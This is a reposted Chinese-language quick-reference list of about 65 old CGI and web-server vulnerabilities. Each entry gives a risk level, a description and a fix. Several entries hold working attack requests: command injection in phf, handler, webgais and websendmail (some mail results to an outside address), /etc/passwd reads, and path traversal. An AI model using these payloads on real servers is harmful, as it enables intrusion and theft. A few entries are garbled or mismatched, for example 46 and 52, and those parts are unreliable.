![[ 永遠的UNIX::UNIX技術資料的寶庫 ]](/images/title.gif) GB | BIG5
|
| 首頁 > 安全技術 > 程序 > 正文 |
 |
| CGI安全漏洞資料速查 v1.0 |
| http://magazine.nsfocus.com (2001-04-19 16:27:16) |
#############################################################################
本文取自一位朋友.這本來不算是什珍貴的東西,如果你平時注意收集的話,相信很多人都會
有比這份更全面、更好的資料.但由某些原因.這些資料一直都不肯被公開.但我是一個崇尚完
全自由、完全開放、完全共享的little guys.所以我把這份資料公開了.希望那位朋友不要怪罪 :)
# 如有任何安全組織或個人願意無嘗對此文進行長期的、不間斷地維護、更新或更改. 請自行
隨便,不必與我商討.但要求是成果必須完全地向internet公開. 任何行為的私藏都是不受歡
迎的.
# 本文歡迎轉摘.但請保持這些聲明。
# 如有任何問題或建議,請mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################
1
類型: 攻擊型
名字: phf
風險等級: 中
描述: 在NCSA 或者 Apache (1.1.1版本以內)非商業版本的Web Server中有一段程序util.c,允許黑客以root身份執行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議:
解決方法: 把Apache web server升級到1.1.1以上,或者將NCSA web server升級到最新版本
_________________________________________________________________
2
類型: 攻擊型
名字: wguset.exe
風險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統,而且wguest.exe存在您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_用戶能閱讀的文件
建議: 將wguset.exe從你的Web目錄移走或刪除
解決方法: 將wguset.exe從你的Web目錄移走或刪除
___________________________________________________________________
3
類型: 攻擊型
名字: rguset.exe
風險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存在您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_用戶能閱讀的文件
建議: 將rguset.exe從你的Web目錄移走或刪除
解決方法: 將rguset.exe從你的Web目錄移走或刪除
_______________________________________________________________________
4
類型: 攻擊型
名字: perl.exe
風險等級: 低
描述: 在cgi-bin執行目錄下存在perl.exe,這屬嚴重的配置錯誤。黑客可以在perl.exe面加一串指令,利用瀏覽器在server上執行任何腳本程序
建議: perl.exe是放在任何帶執行權限的web目錄下都是不安全的
解決方法: 在web目錄下移除perl.exe這個程序.
____________________________________________________________________
5
類型: 攻擊型
名字: shtml.exe
風險等級: 低
描述: 如果您使用Front Page作為您的WebServer,那入侵者能夠利用IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事
建議: 將shtml.exe從你的Web目錄移走或刪除
解決方法: 將shtml.exe從你的Web目錄移走或刪除
___________________________________________________________________
6
類型: 攻擊型
名字: wwwboard.pl
風險等級: 低
描述: wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
建議: 如無必要可以刪除該文件
解決方法: 對get_variables的子程序中的下面這段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替換為:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}
相關連接: http://hgfr
_________________________________________________________________________
7
類型: 攻擊型
名字: uploader.exe
風險等級: 中
描述: 如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件
建議: 將uploader.exe從你的Web目錄移走或刪除
解決方法: 將uploader.exe從你的Web目錄移走或刪除
________________________________________________________________
8
類型: 攻擊型
名字: bdir.htr
風險等級: 高
描述: 如果您使用NT做為您的WebServer的操作系統,而且bdir.htr存在您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上無止境的創建ODBC數據庫,並生成一些可執行的文件。
建議: 將bdir.htr從你的Web目錄移走或刪除
解決方法: 將bdir.htr從你的Web目錄移走或刪除
__________________________________________________________________
9
類型: 攻擊型
名字: Count.cgi
風險等級: 高
描述: 在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠程執行任何指令.
建議: 如無必要可以刪除該文件
解決方法: 將wwwcount升級到2.4或者以上
_________________________________________________________________
10
類型: 攻擊型
名字: test-cgi
風險等級: 高
描述: test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法: 刪除test-cgi文件
__________________________________________________________________
11
類型: 攻擊型
名字: nph-test-cgi
風險等級: 高
描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法: 刪除nph-test-cgi文件
__________________________________________________________________
12
類型: 攻擊型
名字: php.cgi
風險等級: 低
描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系統文件可以被入侵者讀取的漏洞
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除php.cgi程序是最好的辦法
_________________________________________________________________
13
類型: 攻擊型
名字: handler
風險等級: 低
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠程執行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除handler文件
________________________________________________________________
14
類型: 攻擊型
名字: webgais
風險等級: 高
描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個毛病使入侵者可以繞過程序的安全機制,執行系統命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80
query=';mail+you\@your.host建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除webgais文件
________________________________________________________________
15
類型: 攻擊型
名字: websendmail
風險等級: 高
描述: /cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令:
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org&content=a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件
____________________________________________________________________
16
類型: 攻擊型
名字: webdist.cgi
風險等級: 高
描述: 對Irix6.2和6.3平台,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統上執行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi
__________________________________________________________________
17
類型: 攻擊型
名字: faxsurvey
風險等級: 高
描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務器執行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/faxsurvey文件
_______________________________________________________________________
18
類型: 攻擊型
名字: htmlscript
風險等級: 中
描述: 安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使入侵者可以查看服務器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3。0以上
__________________________________________________________________________
19
類型: 攻擊型
名字: pfdisplay
風險等級: 中
描述: 在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務器上的文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補丁
補丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69
Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8
Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
_____________________________________________________________________
20
類型: 攻擊型
名字: www-sql
風險等級: 中
描述: www-sql存在/cgi-bin/目錄下,這將導致入侵可以越權訪問被保護的文件
建議: 最好刪除www-sql文件
解決方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相關連接:
_________________________________________________________________________________
21
類型: 攻擊型
名字: view-source
風險等級: 高
描述: 在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使入侵者可以查看服務器上的任何文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的viewsource程序
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________
22
類型: 攻擊型
名字: campas
風險等級: 高
描述: 在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的campas程序
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
___________________________________________________________________________
23
類型: 攻擊型
名字: aglimpse
風險等級: 高
描述: 在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登錄而隨意執行任何指令
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的aglimpse程序
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________________
24
類型: 攻擊型
名字: AT-admin.cgi
風險等級: 中
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允許普通用戶完全控制整個系統
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的AT-admin.cgi程序
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
____________________________________________________________________________________
25
類型: 攻擊型
名字: finger
風險等級: 中
描述: 這個位/cgi-bin下的finger程序,可以查看其它服務器的信息,但是如果將參數改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的finger程序
相關連接:
_____________________________________________________________________________________
26
類型: 攻擊型
名字: webwho.pl
風險等級: 中
描述: 如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那入侵者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。
建議: 將webwho.pl從您的Web目錄中刪除或移走
解決方法: 將webwho.pl從您的Web目錄中刪除或移走
_____________________________________________________________________________________
27
類型: 攻擊型
名字: w3-msql
風險等級: 低
描述: MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用以httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf()函數引起的。
建議: 如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文件刪除或移走
解決方法: 如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文件刪除或移走.或使用以下補丁。
補丁:
------ w3-msql.patch ---------
410c410
< scanf("%s ", boundary);
---
> scanf("%128s ", boundary);
418c418
< strcat(var, buffer);
---
> strncat(var, buffer,sizeof(buffer));
428c428
< scanf(" Content-Type: %s ", buffer);
---
> scanf(" Content-Type: %15360s ", buffer);
------ w3-msql.patch ---------
__________________________________________________________________________________________
28
類型: 攻擊型
名字: Netscape FastTrack server 2.0.1a
風險等級: 中
描述: UnixWare 7.1附帶的Netscape FastTrack server 2.0.1a存在一個遠程緩沖區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供UnixWare文檔。如果向該服務器傳送一個長度超過367字符的GET請求,會使緩沖區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權限執行。
建議: 臨時解決方法是關閉Netscape FastTrack服務器
解決方法: 臨時解決方法是關閉Netscape FastTrack服務器。
_____________________________________________________________________________________
29
類型: 攻擊型
名字: AnyForm.cgi
風險等級: 高
描述: 位cgi-bin目錄下的AnyForm.cgi程序,是用簡單表單通過郵件傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用,在server上執行任何指令.
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 建議升級該cgi程序,或者刪除該文件
相關連接: http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=719
___________________________________________________________________________________________
30
類型: 攻擊型
名字: whois.cgi
風險等級: 低
描述: 在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
Whois Internic Lookup - version: 1.02
CC Whois - Version: 1.0
Matt's Whois - Version: 1
他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任意的代碼
建議: 將在您Web目錄中問whois.cgi刪除或移走
解決方法: 將在您Web目錄中問whois.cgi刪除或移走
_________________________________________________________________________________
31
類型: 攻擊型
名字: environ.cgi
風險等級: 中
描述: 在Apache web server或者IIS等其它web server的/cgi-bin/environ.cgi 程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 建議升級該cgi程序,或者刪除該文件
相關連接:
___________________________________________________________________________________
32
類型: 攻擊型
名字: wrap
風險等級: 中
描述: /cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件的非法訪問,如:
http://host/cgi-bin/wrap?/../../../../../etc
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/wrap文件
相關連接: http://phoebe.cps.unizar.es/~spd/pub/ls.cgi
________________________________________________________________________________
33
類型: 攻擊型
名字: edit.pl
風險等級: 中
描述: /cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用戶的配置情況:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/edit.pl文件
相關連接: http://phoebe.cps.unizar.es/~spd/pub/ls.cgi
________________________________________________________________________________
34
類型: 攻擊型
名字: service.pwd
風險等級: 中
描述: UNix系統的http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root service.pwd
chmod 700 service.pwd
相關連接:
___________________________________________________________________________
35
類型: 攻擊型
名字: administrators.pwd
風險等級: 中
描述: UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root administrators.pwd
chmod 700 administrators.pwd
相關連接:
_____________________________________________________________________________
36
類型: 攻擊型
名字: users.pwd
風險等級: 中
描述: UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root users.pwd
chmod 700 users.pwd
相關連接:
_________________________________________________________________________________
37
類型: 攻擊型
名字: authors.pwd
風險等級: 中
描述: UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root authors.pwd
chmod 700 authors.pwd
相關連接:
______________________________________________________________________________
38
類型: 攻擊型
名字: visadmin.exe
風險等級: 中
描述: 在OmniHTTPd Web Server的cgi-bin目錄下存在這個文件visadmin.exe,那攻擊者只要輸入下面的命令:
http://omni.server/cgi-bin/visadmin.exe?user=guest
數分鐘之服務器的硬盤將會被撐滿
建議: 建議刪除
解決方法: 把visadmin.exe從cgi-bin目錄中刪除
相關連接:
________________________________________________________________________________
39
類型: 攻擊型
名字: get32.exe
風險等級: 高
描述: Alibaba的web server,其cgi-bin目錄存在get32.exe這個程序,允許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
建議: 建議刪除
解決方法: 把GET32.exe從cgi-bin目錄中刪除
相關連接:
______________________________________________________________________________________
40
類型: 攻擊型
名字: alibaba.pl
風險等級: 高
描述: Alibaba的web server,其cgi-bin目錄存在alibaba.pl這個程序,允許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/alibaba.pl|dir
建議: 建議刪除
解決方法: 把alibaba.pl從cgi-bin目錄中刪除
相關連接:
___________________________________________________________________________________
41
類型: 攻擊型
名字: tst.bat
風險等級: 高
描述: Alibaba的web server,其cgi-bin目錄存在tst.bat這個程序,允許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
建議: 建議刪除
解決方法: 把tst.bat從cgi-bin目錄中刪除
相關連接:
___________________________________________________________________________________
42
類型: 攻擊型
名字: fpcount.exe
風險等級: 低
描述: 如果您使用NT作為您的WebServer的操作平台,並只安裝了SP3補丁,那入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕訪問
建議: 將在您Web目錄中的fpcount.exe刪除或移走
解決方法: 將在您Web目錄中的fpcount.exe刪除或移走
_________________________________________________________________________________
43
類型: 攻擊型
名字: openfile.cfm
風險等級: 低
描述: 如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那入侵者可能能夠利用它們讀到您系統上的所有文件
建議: 將在您Web目錄中的openfile.cfm刪除或移走
解決方法: 將在您Web目錄中的openfile.cfm刪除或移走
_______________________________________________________________________________________
44
類型: 攻擊型
名字: exprcalc.cfm
風險等級: 低
描述: 如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那入侵者可能能夠利用它們讀到您系統上的所有文件
建議: 將在您Web目錄中的exprcalc.cfm刪除或移走
解決方法: 將在您Web目錄中的exprcalc.cfm刪除或移走
相關連接: http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
______________________________________________________________________________
45
類型: 攻擊型
名字: displayopenedfile.cfm
風險等級: 低
描述: 如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那入侵者可能能夠利用它們讀到您系統上的所有文件
建議: 將在您Web目錄中的displayopenedfile.cfm刪除或移走
解決方法: 將在您Web目錄中的displayopenedfile.cfm刪除或移走
相關連接: http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
_______________________________________________________________________________
46
類型: 攻擊型
名字: sendmail.cfm
風險等級: 中
描述: 將在您Web目錄中的openfile.cfm刪除或移走
在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
Whois Internic Lookup - version:
1.02
CC Whois - Version: 1.0
Matt's Whois - Version: 1
他們將使入侵者
能夠在您的系統上使用啟動httpd用戶的權限執行任意的代碼
如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那入侵者可能能夠利用它們讀到您系統上的所有文件
建議: 將在您Web目錄中的sendmail.cfm刪除或移走
解決方法: 將在您Web目錄中的sendmail.cfm刪除或移走
相關連接: http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
_________________________________________________________________________________
47
類型: 攻擊型
名字: codebrws.asp
風險等級: 中
描述: 如果您使用NT+IIS作為您的WebServer的情況下,入侵者能夠利用這個ASP查看您系統上所有啟動httpd用戶有權限閱讀的文件
請前往以下地址查詢補丁
Internet Information Server:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
Site Server:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
建議: 將在您Web目錄中的codebrws.asp刪除或移走
解決方法: 將在您Web目錄中的codebrws.asp刪除或移走
_____________________________________________________________________________________
48
類型: 信息型
名字: codebrws.asp_1
風險等級: 中
描述: 在/iissamples/exair/howitworks/下面存在codebrws.asp文件,用下面的路徑:
http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?source=/index.asp就可以查看到index.asp的源碼。實際上任何ascii文件都可以瀏覽。
建議: 刪除名叫/iissamples/的web目錄
解決方法: 將在您Web目錄中的codebrws.asp刪除或移走
請前往以下地址查詢補丁
Internet Information Server:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
Site Server:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
_________________________________________________________________________________
49
類型: 攻擊型
名字: showcode.asp_1
風險等級: 中
描述: 在/msads/Samples/SELECTOR/目錄下存在showcode.asp文件,用下面的路徑:
http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
可以查到boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您系統上所有啟動httpd用戶有權限閱讀的文件
建議: 禁止對/msads目錄的匿名訪問
解決方法: 將在您Web目錄中的showcode.asp刪除或移走
請前往以下地址查詢補丁
Internet Information Server:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
Site Server:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
_________________________________________________________________________________
50
類型: 攻擊型
名字: /msadc目錄可以訪問
風險等級: 中
描述: WindowsNT IIS server下的 /msadc目錄可以訪問,會造成一系列安全問題,包括被入侵者非法調用應用程序
建議: 建議刪除不必要的由IIS缺省安裝形成的目錄
解決方法: 禁止/msadc目錄,如果必須打開該目錄,至少應該設置成合法用戶需要密碼才能訪問
_____________________________________________________________________________________
51
類型: 攻擊型
名字: search97.vts
風險等級: 中
描述: 這個文件將能使入侵者任意的讀取你系統中啟動httpd用戶能讀取的文件
建議: 將在您Web目錄中的search97.vts刪除或移走
解決方法: 將在您Web目錄中的search97.vts刪除或移走,或前往以下地址下載Patch
https://customers.verity.com/products/server/310/patches/
_____________________________________________________________________________
52
類型: 攻擊型
名字: carbo.dll
風險等級: 低
描述: 如果您安裝了Systems running iCat Suite version 3.0,那它將自動在你的系統上添加一個叫carbo.dll的文件,而入侵者將能利用這個文件訪問您系統上的熱和文件
建議: 將在您Web目錄中的openfile.cfm刪除或移走
解決方法: 將在您Web目錄中的openfile.cfm刪除或移走
__________________________________________________________________________
53
類型: 攻擊型
名字: whois_raw.cgi
風險等級: 低
描述: 因為whois_raw.cgi作者的失誤,這個CGI將使入侵者能夠以您系統上啟動httpd的用戶的權限執行您系統上任意的程序
建議: 將在您Web目錄中的whois_raw.cgi刪除或移走
解決方法: 將在您Web目錄中的whois_raw.cgi刪除或移走
_______________________________________________________________________________
54
類型: 攻擊型
名字: doc
風險等級: 低
描述: 您的Web目錄可以文件列表,這將幫助入侵者分析您的系統信息
建議: 將您的所有Web目錄設置為不能文件列表
解決方法: 將您的所有Web目錄設置為不能文件列表
_______________________________________________________________________________
55
類型: 攻擊型
名字: .html/............./config.sys
風險等級: 低
描述: 如果您使用的是較久版本的ICQ,那入侵者能夠利用它閱讀您機器上的所有文件
建議: 下載新版本的ICQ
解決方法: 請前往以下地址下載新版本的ICQ
http://www.icq.com/download/
______________________________________________________________________
56
類型: 攻擊型
名字: ....../
風險等級: 中
描述: 您使用的WebServer軟件能使入侵者閱讀您系統上的所有文件
建議: 更換或升級您的WebServer軟件
解決方法: 更換或升級您的WebServer軟件
_________________________________________________________________________
58
類型: 攻擊型
名字: no-such-file.pl
風險等級: 低
描述: 由您的WebServer軟件的缺陷,使得入侵者能夠利用不存在的CGI腳本請求來分析您的站點的目錄結構
建議: 升級您的WebServer軟件
解決方法: 升級您的WebServer軟件
________________________________________________________________________________
59
類型: 攻擊型
名字: _vti_bin/shtml.dll
風險等級: 低
描述: 入侵者利用這個文件將能使您的系統的CPU佔用率達到100%
建議: 將_vti_bin/shtml.dll從您的Web目錄刪除或移走
解決方法: 將_vti_bin/shtml.dll從您的Web目錄刪除或移走
______________________________________________________________________
60
類型: 信息型
名字: nph-publish
風險等級: 中
描述: 在/cgi-bin目錄下存在nph-publish文件,這使入侵者能通過www瀏覽服務器上的任何文件
建議: 建議審查/cgi-bin目錄,刪除不必要的cgi程序
解決方法: 刪除nph-publish文件
______________________________________________________________________
61
類型: 信息型
名字: showcode.asp
風險等級: 中
描述: 在/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/目錄下存在showcode.asp文件可以被入侵者利用來查看服務器上的文件內容
建議: 最好禁止/msadc這個web目錄的匿名訪問,建議刪除這個web目錄
解決方法: 刪除showcode.asp文件
_________________________________________________________________________
62
類型: 信息型
名字: _vti_inf.html
風險等級: 中
描述: web根目錄下存在_vti_inf.html文件,該文件是Frontpage extention server的特征,包含了一系列Frontpage Extention Server的重要信息;而且Frontpage Extention server是一個有很多漏洞的web服務,用它入侵者可能直接修改首頁文件
建議: 用ftp等其它方式上載網頁文件
解決方法: 卸載Frontpage Extention Server
________________________________________________________________________________
63
類型: 信息型
名字: index.asp::$DATA
風險等級: 中
描述: asp程序的源代碼可以被綴+::$DATA的方法查看到,這樣入侵者可以設法查到服務器數據庫密碼等重要信息
建議: 建議留意微軟最新關codeview的補丁和安全公告
解決方法: 安裝services pack6或者打補丁:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix/
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix/
___________________________________________________________________________________
64
類型: 攻擊型
名字: main.asp%81
風險等級: 低
描述: asp程序的源代碼可以被綴+%81的方法查看到,這樣入侵者可以設法查到服務器數據庫密碼等重要信息
建議: 建議留意微軟最新關codeview的補丁和安全公告
解決方法: 安裝services pack6或者打補丁:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix/
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix/
____________________________________________________________________________________
65
類型: 信息型
名字: showcode.asp_2
風險等級: 中
描述: 在/msadc/Samples/SELECTOR/目錄下存在showcode.asp文件,用下面的路徑:
http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
可以查到boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您系統上所有啟動httpd用戶有權限閱讀的文件
建議: 禁止對/msadc目錄的匿名訪問
解決方法: 將在您Web目錄中的showcode.asp刪除或移走
請前往以下地址查詢補丁
Internet Information Server:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
Site Server:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
